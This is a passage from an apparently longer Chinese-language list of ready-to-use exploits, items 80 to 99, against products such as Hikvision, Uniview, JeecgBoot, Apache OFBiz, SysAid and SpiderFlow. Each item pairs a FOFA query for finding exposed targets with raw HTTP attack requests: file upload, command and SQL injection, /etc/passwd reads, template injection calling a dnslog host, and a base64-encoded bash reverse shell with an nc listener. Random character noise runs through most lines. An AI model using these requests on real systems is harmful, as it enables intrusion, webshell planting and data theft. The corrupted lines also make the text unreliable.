5 R& x9 ^) Z7 s# B3 J7 uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
) E. A2 j8 l* V. Y4 G& C) k+ vAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
) w. v) V9 X$ |; {Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 q) @6 w2 k/ H) J( N/ M
Accept-Encoding: gzip, deflate1 g7 T0 i$ L: I' X2 ^8 j
Connection: close
; F9 o9 \( O4 ?( gUpgrade-Insecure-Requests: 1
+ h! K, F) m F1 O6 a$ m" a8 X, X8 o& A7 p" g. R3 [
. u1 ]( O. j) G) }# V: z80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传8 o/ \ A' {# O$ W2 f0 `1 ]
FOFA:app="速达软件-公司产品"6 a, g7 K# ?8 W, @8 u6 B& F& y* q
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
; R( r' l( F- p" d( THost: x.x.x.x
8 j7 b, k& S3 v; AUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
! `" @2 q$ x' v- nContent-Length: 27' a) r+ x' m4 _
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
0 X [5 I5 P: p @3 H1 N$ bAccept-Encoding: gzip, deflate
6 j+ Z4 e) o$ lAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 h, D( Z1 G9 A% Y e+ s! g% RConnection: close2 x" x( `4 e3 m/ A( X3 u
Content-Type: application/octet-stream
' G. _8 ?# J# f* p& M. RUpgrade-Insecure-Requests: 1! m8 J+ r8 u7 g. A
( [6 Y$ u5 O3 n$ @% K2 b# V1 J
<% out.print("oessqeonylzaf");%>8 w9 s/ O% P( ^2 q8 i2 c
9 f$ O: o( v) P* {$ \( ~: C
4 U- ^) C5 X2 j7 Z; sGET /xykqmfxpoas.jsp HTTP/1.1- N5 |' Y3 d# t2 Q3 |
Host: x.x.x.x! ?! o2 T" }# ?! N+ Z4 R
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15* i: [" z9 m! A7 |% W$ s- n& u- F
Connection: close( x: Z# ]) K8 N* Q
Accept-Encoding: gzip
8 N }8 g3 _3 R
1 b& Y. Y3 S5 U# V/ L- L6 ^# ?: G1 e1 d. a8 o
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露0 p% c" S5 Q# s* E6 o3 a5 c
FOFA:app="uniview-视频监控"$ y: R. E# P1 }! L; S5 _2 W6 ^) o5 y
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1, ^2 l- S, ?9 a/ P' D0 h
Host: x.x.x.x
H# P6 o, X. q W" I4 z' f2 I) wUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
' F: r/ Y+ W/ y2 B" M; Z3 XConnection: close
# N: U3 ]2 ~& o% eAccept-Encoding: gzip! i3 L0 k* f2 {7 b& D
1 t: {7 T7 ~. C8 q9 z( s% R: [
( y# J3 }# s1 ^" ]8 Q. t) k
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行' f$ {/ ~! b1 `" E* l6 E8 L
FOFA:app="思福迪-LOGBASE"6 K$ r- V/ m5 r/ v0 k% o+ x8 B
POST /bhost/test_qrcode_b HTTP/1.14 j) O$ U9 e4 E$ q: {: h
Host: BaseURL- Q; b( c6 x! B+ x8 U4 }; r
User-Agent: Go-http-client/1.1
4 C7 z& V t" `1 ^: _' RContent-Length: 23
) F1 R& Y9 T0 S# v* G% P1 s8 oAccept-Encoding: gzip' J. q8 l; K. U: `
Connection: close" ~& T( m8 L( @, I; ?! v
Content-Type: application/x-www-form-urlencoded; m) g5 T# f4 @
Referer: BaseURL$ e7 J, R( I) b0 V6 d) s* v& c7 |1 T
, p6 W1 v8 S2 L2 }+ |% [ ~- g
z1=1&z2="|id;"&z3=bhost
; o- A: w h0 `( d) L, a" B' ]- Y' G, ^* E3 W' B
" Q+ t* z1 i6 R5 T( F0 h% C5 _
83. JeecgBoot testConnection 远程命令执行
8 U7 k7 ^5 s# [0 \/ L- [+ ]FOFA:title=="JeecgBoot 企业级低代码平台"8 K, Z9 v5 Z& Z1 [/ z' ?! l
+ c; z# x4 J1 J
; N) B& y: ~- C4 L4 e! M
POST /jmreport/testConnection HTTP/1.1* l: I6 ]8 U. A$ r
Host: x.x.x.x2 @7 z- Q K4 B
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
5 t# G9 \9 F6 `9 ^Connection: close4 G' i) S, u. i$ I) S7 y, P
Content-Length: 8881
4 K. l3 N5 a' s; T6 ]2 r! p' RAccept-Encoding: gzip
1 `' }, ?0 @/ W+ v/ ^! z* N. YCmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"1 a: \4 C) R% _6 U
Content-Type: application/json& r: n6 A( f6 k3 W$ l
3 P D! K( j ?7 r; a5 y3 e
PAYLOAD8 O7 Q3 K3 I) U
0 m/ S! a8 N- m+ K S4 h1 m5 j84. Jeecg-Boot JimuReport queryFieldBySql 模板注入( S! a% n1 L$ Q7 W7 |, s
FOFA:title=="JeecgBoot 企业级低代码平台"" Q6 ?! ^. _+ ~; U" N# K# i {
- W! c/ h) `' {. _; D) J) h( b$ n: @1 R( p
9 X4 W) ~$ b8 n& |: B0 EPOST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1. Q' z; s0 n6 Y
Host: 192.168.40.130:8080( |8 b- ~ X# s) d- K1 }7 ]
User-Agent: curl/7.88.1) m5 @) |/ Y+ q v. H
Content-Length: 156: p( h% V6 Y0 y9 o( v
Accept: */*1 K; w& X0 Y4 |) N2 e" B
Connection: close
8 w6 R& }) n+ q: h2 y+ }0 t/ C( bContent-Type: application/json
( b; v- A$ O- n( E) aAccept-Encoding: gzip. E) ~ h# l9 Z+ t; U( \) a
' ~: |. s5 _1 R S9 j{
4 H' i7 K. {% h- ` "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",2 E7 p/ \- d& A+ A }9 I. |$ P+ @
"type": "0"
/ P% }) ?9 C5 ^: I* M* Y0 c}( A) T9 m' F0 w2 M2 J! z
8 x( p n! j1 }# A u
' w: v. B. |' }+ |; V& F; w85. SysAid On-premise< 23.3.36远程代码执行
: f d& Y" F/ zCVE-2023-47246
" o/ W* C0 P) ?( {# s! SFOFA:body="sysaid-logo-dark-green.png"
0 a9 c. W$ {% }+ N9 e! Y2 [EXP数据包如下,注入哥斯拉马
/ A# N9 U6 [( U3 {7 `- XPOST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1% { Z5 V; r! A" n
Host: x.x.x.x
0 K4 `) O* v6 w: W8 ^User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
) I: p% i1 H0 l9 xContent-Type: application/octet-stream
9 [( T0 w) k, X; W% QAccept-Encoding: gzip
9 p0 r: T0 Z! v: }- C4 O% y# }' d2 h! u' q
PAYLOAD- `4 U- m% H) e- a- a, ?
# X# o+ _; D% N9 C0 j
回显URL:http://x.x.x.x/userfiles/index.jsp1 p a2 Q! N3 s5 B0 E% I
. T5 V( x& \7 q: P2 p# m86. 日本tosei自助洗衣机RCE
5 `# ~0 j9 f$ t9 y dFOFA:body="tosei_login_check.php"
' p1 c. e! ~3 X) R& b' cPOST /cgi-bin/network_test.php HTTP/1.1
1 q% r" ]; Y0 z, @: }2 ?2 U. P; QHost: x.x.x.x! ~6 E9 o2 P$ D! O0 R' l9 g+ G
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
5 Z1 m4 K( O2 i- u+ }5 UConnection: close. n' t# Y* N. {' @
Content-Length: 44! z: `* V9 o8 W! b2 m! ]0 y
Accept: */*
1 N o U4 Y9 Y, k5 r9 tAccept-Encoding: gzip
8 }; c2 ] w( f* e. ~, C0 ^Accept-Language: en
7 J2 k3 H* ?8 H2 m/ g+ iContent-Type: application/x-www-form-urlencoded
[8 G* | ~' a) s' a# H. O
* ]0 D6 K" b3 q/ ?% ^host=%0acat${IFS}/etc/passwd%0a&command=ping
, ? q2 Z/ T- z" O/ F% q L9 s) i4 k4 y: ~* k; s/ s, [
# u8 e0 _$ {/ V& K87. 安恒明御安全网关aaa_local_web_preview文件上传
) v7 r4 T& [0 k* S' B6 p: H& U6 ]FOFA:title="明御安全网关"
0 [7 i6 P1 L. t# K ?" q* BPOST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1! c: _ N* B1 {* }/ s4 w. j$ t
Host: X.X.X.X- K/ b) u1 Q G+ S1 _. Q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.151 \% e# N; Q6 ~" S
Connection: close; K1 T2 V% [2 m2 V1 t
Content-Length: 198
- X0 z1 @" h! B+ u ^% oAccept-Encoding: gzip
$ G: V/ W' B, H( D* u# `Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd- I% m- v: ]+ i; n. h: F& _
2 U$ {- u; p0 E8 m' D$ _& g--qqobiandqgawlxodfiisporjwravxtvd
& J3 |% K2 \7 z6 dContent-Disposition: form-data; name="123"; filename="9B9Ccd.php"
3 [& j9 ?0 ~( |9 d8 @0 PContent-Type: text/plain }& ^$ p j3 o+ x D2 ?. R
/ _6 V7 x& F! R' @2ZqGNnsjzzU2GBBPyd8AIA7QlDq
7 U$ @4 d+ d s& m+ x7 u, s--qqobiandqgawlxodfiisporjwravxtvd--
5 z0 J+ k5 n" Z+ d: w0 a% O% R& m$ ~! h" I1 g+ I' E
/ V7 t2 N$ `2 f. c T$ z
/jfhatuwe.php
2 \; ?: B! \' G$ l
* [3 d J# U T2 y z2 ]) H88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行: N6 r( g) r+ G, }; z
FOFA:title="明御安全网关"
8 I6 y( Z* ^- n6 ~2 x! T9 w6 Z- fGET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1+ x5 ^4 X* Z3 w' N4 H" T9 f
Host: x.x.x.xx.x.x.x
& g% l4 T1 i& m/ `5 I. rUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.151 {, {# d" N. T+ a. c% y; @
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
( R: A$ p2 d- |( C) VAccept-Encoding: gzip, deflate
& w8 s6 {; y, VAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2) l* Z9 B4 \' b! E) K2 Y. f. F
Connection: close6 U) Z+ x" M6 ^9 @
D* I4 ~$ G! a R* a$ f
& N& k4 e/ `/ i9 N* F
/astdfkhl.php
- ^# f- V& z! e2 M: x7 L! B' D- @$ F6 H; L& i4 j$ h
89. 致远互联FE协作办公平台editflow_manager存在sql注入! S E) L1 }# D2 [7 b
FOFA:title="FE协作办公平台" || body="li_plugins_download"
2 @$ q2 f: s5 w5 q% T$ {1 [POST /sysform/003/editflow_manager.js%70 HTTP/1.1
9 `- `7 [7 S9 p( THost: x.x.x.x
, l( w: N. ]6 y1 w# G6 w/ C7 y* eUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
8 E. E8 u- e2 n% z0 {Connection: close2 I3 _+ |; D% n5 a: @8 ]6 K2 D
Content-Length: 41
6 q6 A* Q+ D" m6 D1 R4 FContent-Type: application/x-www-form-urlencoded( V( N- N% E. E& u/ z
Accept-Encoding: gzip n j8 j! b$ V
2 d. Q2 s1 K" x. ~% [
option=2&GUID=-1'+union+select+111*222--+
$ Q8 K0 D0 e: J- E6 F
" z9 U+ N+ G- e5 q3 ^- Q* q, Z0 Z v' Z: ]5 c% Z
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行; }3 U' }* ]" _9 R5 n; C
FOFA:icon_hash="-1830859634": U4 E( b$ o, v, m
POST /php/ping.php HTTP/1.15 \0 A: V$ w. s% D
Host: x.x.x.x6 _. `8 w6 K4 `4 H. q: D0 a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
- x) L# @2 e5 Q2 IContent-Length: 51
1 g3 g: s+ b& H9 }( e8 hAccept: application/json, text/javascript, */*; q=0.01
) h" L6 a9 A8 f$ [Accept-Encoding: gzip, deflate" c9 ?. u+ P1 u9 Y8 h, O
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 B% }* p. Z1 A8 }: }1 xConnection: close4 k' h4 s+ n+ H" J" [7 y/ S, O5 C
Content-Type: application/x-www-form-urlencoded4 L6 U; f4 ^ e# y0 n
X-Requested-With: XMLHttpRequest8 ~5 h r3 v9 s- T
* i% _) S6 O5 k- q: }) r" L
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig9 w* _# o' v( c' h0 ]1 S
8 r! x5 p; V5 |5 h1 [6 I5 B8 `
$ S" k) Q1 e& v0 M
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
4 T/ D* A$ ^* N5 h$ M, r% k6 L3 XFOFA:title="综合安防管理平台" f9 u- _2 q% i& n0 {
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
; l" e% l4 e: `Host: your-ip
7 l% ^) Y& V/ _1 x3 Q& NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.369 j, w8 ~# S4 ?+ j) r) U3 [
Accept-Encoding: gzip, deflate
, A0 b: y9 Q+ p+ Z! TAccept: */*
! j; k( ~* w7 B/ k4 u* XConnection: keep-alive* X4 L8 u' [/ K# e
8 ` B* G* O' @2 B6 n1 O9 C( C$ g
5 B, M6 w! m" e( [
) F5 l& [; G3 c2 O3 U; i* y8 E
92. 海康威视运行管理中心session命令执行
& ]# l# f' B5 g/ e- x0 v4 Z. x; dFastjson命令执行
|- \* x8 ^( P( v1 ^! q# v# Lhunter:web.icon=="e05b47d5ce11d2f4182a964255870b76" L$ o; g; I' ?
POST /center/api/session HTTP/1.1
+ I6 f3 l4 M% H% z. ?! C, HHost:; `+ g0 ]$ j. m5 K! d. o1 ]
Accept: application/json, text/plain, */*
+ |5 k$ V0 W* ~0 z; P6 G% vAccept-Encoding: gzip, deflate
" M5 h! [& T# i0 s. zX-Requested-With: XMLHttpRequest
9 a! l- p. c) x2 GContent-Type: application/json;charset=UTF-8
: |4 n, M3 a: r+ }* H$ e* vX-Language-Type: zh_CN% M2 I& ^1 q+ g2 x+ V$ h$ Y
Testcmd: echo test [) I- F' C- `8 Z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36, Q5 E) h6 d6 a# L
Accept-Language: zh-CN,zh;q=0.96 E' g! x& B7 j$ V/ d7 w! @, @' E
Content-Length: 5778
5 e" j/ R4 m6 p$ l6 ?8 o, H! g# b" ?
PAYLOAD0 Y; |$ }$ e* W* j, P) T
+ \: Y2 E) j! p/ }* r' ^
! G, }, i+ g1 H3 p7 z93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传: E7 ^" c# v3 s4 W
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="+ s: ^) e9 E2 w+ H- C5 Y* z& ]! e
POST /?g=app_av_import_save HTTP/1.1# S( a6 @. X! x7 a( X
Host: x.x.x.x* d+ r, G2 s' d
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx, w5 B9 v7 e8 h) E1 I
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36' O, B% r& [- i" o S6 K
8 `1 X- N! y8 e" |------WebKitFormBoundarykcbkgdfx
$ \5 T" \3 |% F9 g( dContent-Disposition: form-data; name="MAX_FILE_SIZE"
) ?; c7 T5 T4 I1 d( T
* H, t- c, d+ D( s2 p! H10000000( I+ U* P. _2 B+ s' J4 {2 [
------WebKitFormBoundarykcbkgdfx
6 s& ^! z" L7 t' `( U( KContent-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"4 k8 q) p3 f: A; Q9 O" } \
Content-Type: text/plain& X& J: ^; `& ~! ^* o( I. @: I
! o$ f$ N/ p l% Y5 ]" zwagletqrkwrddkthtulxsqrphulnknxa, R4 y3 C4 ^- K: P4 ?* S
------WebKitFormBoundarykcbkgdfx
: B/ d$ e5 K* I5 w/ b' RContent-Disposition: form-data; name="submit_post"2 Y5 f/ s3 b" k8 P
8 |+ W1 A7 K; w% I
obj_app_upfile
. I, C( B, V5 J+ C------WebKitFormBoundarykcbkgdfx
; y" k1 z- ^& d! ?2 J$ r* ~3 YContent-Disposition: form-data; name="__hash__"
+ K, l( c6 k! E4 R: Y2 K9 c! _' X8 ~4 p6 [
0b9d6b1ab7479ab69d9f71b05e0e9445
1 ~+ M" \8 l; O6 F9 W2 S------WebKitFormBoundarykcbkgdfx--
3 j$ x. v3 B" u. l# B. u) ^& T5 o+ K3 Z' G$ B/ C
4 h3 f2 i) b8 W
GET /attachements/xlskxknxa.txt HTTP/1.1, ~6 X. n0 n2 K- n8 G) ]
Host: xx.xx.xx.xx
^- t& Z9 @: s! s+ i$ k1 r$ IUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
/ c+ M# \1 y$ a( d# \) @- }: C
8 H1 D7 `; V/ L$ v' P0 s% Z$ B4 j
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
9 m* v5 w4 g \/ l8 z2 s8 ~3 `, @FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="5 v' G2 X& m7 U' i# C+ z
POST /?g=obj_area_import_save HTTP/1.1( p& O' f x, ?% ~! T
Host: x.x.x.x4 c# f1 m1 r4 F# k) u
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
; _6 i5 l+ V) k3 L8 T/ dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
1 Q# e7 G( y9 M1 K# `. |; [" |# B# h' F1 L H9 j
------WebKitFormBoundarybqvzqvmt$ C2 i: c `7 o/ I+ i. A
Content-Disposition: form-data; name="MAX_FILE_SIZE"6 d" e) G \% ~1 ~0 y
$ B S p2 s+ P# A1 A7 o
10000000
* m) w/ f5 g4 T7 b: g2 K' Y8 t( E------WebKitFormBoundarybqvzqvmt) ^7 Y9 z0 p$ i6 C. i& n2 S, F
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt") Q5 R, z+ k" [4 Y
Content-Type: text/plain; @, p! Q7 |* Y" R8 O, {2 f5 q
$ x5 T* f7 E4 ipxplitttsrjnyoafavcajwkvhxindhmu
7 x6 J; ~5 v/ G& s o* L------WebKitFormBoundarybqvzqvmt6 {+ _$ y: H/ j7 O
Content-Disposition: form-data; name="submit_post"% J: R# }! O8 ^# G! _
0 {( O/ \, n b) h# y$ F( d( v2 {
obj_app_upfile
7 f5 _% V4 P Q* H; q------WebKitFormBoundarybqvzqvmt
4 m% p; M ^, o1 H: P7 _Content-Disposition: form-data; name="__hash__"
3 @5 H5 l1 a' |$ a( t4 S: `
" c/ F2 R# ?7 P; [0b9d6b1ab7479ab69d9f71b05e0e9445
! W- k& @6 F9 V# u8 n------WebKitFormBoundarybqvzqvmt--
# `8 L! t, I1 Z+ l9 s/ R% M& h0 ?+ @) }7 d. H1 l/ ]$ W
# r- \5 R$ W+ E; B0 c1 h0 ~
* C7 Q' n7 L/ c3 eGET /attachements/xlskxknxa.txt HTTP/1.17 q9 T2 E: V: V+ O8 T, g
Host: xx.xx.xx.xx) @0 A6 e! y" b) \! f2 @5 W
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36% ^8 U2 z% m( t. B y0 ]/ o4 i3 B, v
; K6 A' E. x! d' u9 G1 s
7 ]8 T q2 z y9 x. g; A7 P
, b" Y' N5 x# K' M95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行) B. R/ p( S- R$ q% u: C
CVE-2023-49070
% a! D3 N& A1 ]! tFOFA:app="Apache_OFBiz"
& l0 M9 X0 n3 [! kPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
8 _6 f( p4 W8 H5 H1 LHost: x.x.x.x
$ _" f: G% R( h% w) WUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.363 c! d* f9 |- p3 H
Connection: close# W7 e5 O% M s: {
Content-Length: 889
, d. N3 s8 _( j/ ]Content-Type: application/xml
0 J1 T0 i% e+ P: {8 oAccept-Encoding: gzip
" |2 W3 j$ ~. ^5 N) K4 t. S
" s; h# s" N( t+ H0 p# x; E5 b<?xml version="1.0"?>- H; x/ f- y, [2 e- x7 C& v$ A
<methodCall>5 P( |" W6 O8 g
<methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>+ c: z7 V1 K/ K) y
<params>% i3 @6 h' c' ]6 o
<param>
. y% L' a! R1 F5 Y6 v& H* ?& p <value>! ^ @# z( A" D' c
<struct>, ^" i9 [! j7 T9 {5 {
<member>
3 M. M2 |+ u; {4 \" N" s% `; N <name>test</name>
+ \% h- M- @* e! G( D1 ? <value>0 H6 p' F; K1 F b* Q! n
<serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>
! i, t9 |4 {: J0 y6 m! _ </value>
- E/ j8 O& A, d1 y </member># J5 f' }# I M. A0 H" _
</struct>
# |2 W3 U$ u* u7 w( _+ T. { </value>
( v& J1 {9 e( i, n# A! c \ </param>6 q) g7 Z8 h5 p3 ]
</params>0 ^7 l! o8 w* f" {* C
</methodCall>/ V0 m8 b5 A; k& L* {6 P4 E
8 C! T: {2 o8 F/ S( u5 K v! Q+ {2 b3 K- F6 J
用ysoserial生成payload1 q. X2 M4 m8 E7 f
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"0 I% u2 O( c: r5 A2 D
( J! J& b+ z) N# F+ t7 w3 g
: W$ w2 H" @( Z
将生成的payload替换到上面的POC
/ g) ]5 ^, C4 ]+ a! z0 H- I. }POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1% R- s! J1 h1 G7 R
Host: 192.168.40.130:8443
; H1 O. L* _4 z) x7 C* Z* UUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36% W& d$ _( |8 x) { q3 e: F7 F
Connection: close
( C! q; S$ H. k+ R; ^) f) L+ o( SContent-Length: 889: v$ B2 l E6 L8 K) W0 q7 s: A
Content-Type: application/xml
G/ J B3 U$ q0 @# b/ GAccept-Encoding: gzip
! J: P# X6 }/ u& ^6 G
% J& S9 }! c T( v1 \# w+ O6 t- HPAYLOAD8 r) L: w, e8 p. P, r
4 y: X, y6 _ P$ X7 Z96. Apache OFBiz 18.12.11 groovy 远程代码执行0 F" M8 E3 I: s% _. x& H. \$ t
FOFA:app="Apache_OFBiz"
. @2 v3 U, e) s9 B7 tPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
3 k5 c; S4 s D, E" B7 B jHost: localhost:8443
$ G, [ z ?$ K$ U$ _1 @0 j; D' H9 eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
H, \. C# _: d; \$ \' nAccept: */*
/ }7 P" O7 h' Y2 eAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
) g) _" d; C5 j( e( Z* L& `Content-Type: application/x-www-form-urlencoded* \1 V2 w/ ?7 }$ z4 D- k
Content-Length: 55
5 B/ E; K6 U2 p N/ {% i% T2 u- J( b
groovyProgram=throw+new+Exception('id'.execute().text);7 _9 O3 z) x5 j2 V/ \# f
% E: f1 m0 x( D9 U4 h! ?
5 S( j7 v. v. h反弹shell6 Y- u8 c( Z( \
在kali上启动一个监听; Y" c. O( h) w$ W: D% m- L9 \
nc -lvp 7777
& R; G) U/ x8 e
' w0 K- b/ ]! [2 X8 H" ~ _3 lPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
! o1 Z8 T+ V8 I; ^, E6 [Host: 192.168.40.130:8443/ J8 p2 W- ] I( A; j) G0 X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
, i- L4 w# f* P$ e. D$ AAccept: */*
. S1 h0 p; M$ D V3 T) _+ l' b1 [Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
* s3 U5 B2 g# m* y8 ?Content-Type: application/x-www-form-urlencoded
5 m7 e& I: T& h+ gContent-Length: 71& s% z* u3 k4 P4 X4 I- n
& f) C6 W3 `7 |; K- z9 i) p9 Q, d
groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();
x- l+ L# A! t* J' M4 E0 p7 U9 S5 y5 {' H2 |
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
5 t8 N" k& }0 |; nFOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
/ b# c* v+ D5 A& w1 }GET /passport/login/ HTTP/1.1
% a- g' N2 o6 p8 EHost: 192.168.40.130:8085
' }9 v$ V b; P- g. |. tUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15' a6 E* A5 V) k- ]1 |5 T
Accept-Encoding: gzip
1 `0 }7 g8 t% G. g7 \6 B5 e6 oConnection: close8 j! p9 }5 F. x% Y8 y- n
Cookie: rememberMe=PAYLOAD
' [) G d& {. o7 A) vX-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"
# C" m y. F3 V- ]
% \; W; }/ e$ h; z/ D# `
" L& o! ?0 R6 S, Q! b) a0 f3 t1 E98. SpiderFlow爬虫平台远程命令执行
* B& N4 M* t" t( mCVE-2024-0195& B7 A2 @; n- E8 f4 |; o* _
FOFA:app="SpiderFlow"
+ I7 c, Y7 i. LPOST /function/save HTTP/1.1
' p+ U( X; K/ q6 |+ yHost: 192.168.40.130:8088
7 X9 R% r& K; j1 X; {$ |5 P" v xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0- b( v" c s3 x/ z
Connection: close( { z5 q, _3 O9 W
Content-Length: 121
3 e7 p* Y4 K' q+ B# oAccept: */*
+ `8 K- o: h% k! CAccept-Encoding: gzip, deflate
0 h8 s: D* L% ?8 H/ b6 w$ D8 aAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.23 s3 S& j; t4 [
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
/ N, C/ Z$ o3 @5 a1 w/ `X-Requested-With: XMLHttpRequest% x5 X3 s7 w1 G$ y
8 f- m) Z! T5 L5 k% k/ l y
id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
, @8 l0 U: O5 L; B5 \) V" S3 ~! R+ Z2 c& w; D
6 G) o7 ?" A0 |. t$ u
99. Ncast盈可视高清智能录播系统busiFacade RCE
) q* P; i. [' O& y) hCVE-2024-0305
